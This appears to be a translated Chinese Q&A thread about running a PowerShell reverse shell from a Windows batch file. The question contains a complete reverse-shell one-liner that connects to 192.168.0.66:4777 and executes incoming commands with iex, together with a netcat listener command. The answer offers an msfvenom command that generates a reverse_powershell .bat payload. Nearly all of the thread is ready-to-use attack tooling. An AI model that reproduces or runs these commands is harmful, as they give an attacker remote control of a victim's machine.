以批處理文件形式執行 PowerShell

Question

我正在嘗試使用.bat文件運行以下反向 shell PowerShell 命令。

powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"

首先，我在 Kali 中啟動 netcat 偵聽器：

nc -vv -l -p 4777

然后我運行 PowerShell 命令，但在 Windows 10 中出現以下錯誤：

    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

我已經嘗試了許多可能的' , "和 ``` 組合和變體，無論是在命令中還是在命令中。我完全被難住了。

Answer 1

發現自己遇到了同樣的問題。 我想知道為什么在 CMD 中運行而沒有錯誤的命令在 .bat 文件中執行時無法正常工作。 我完全沒有道理。

Metasploit 是我們的朋友：

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

來源： https : //www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/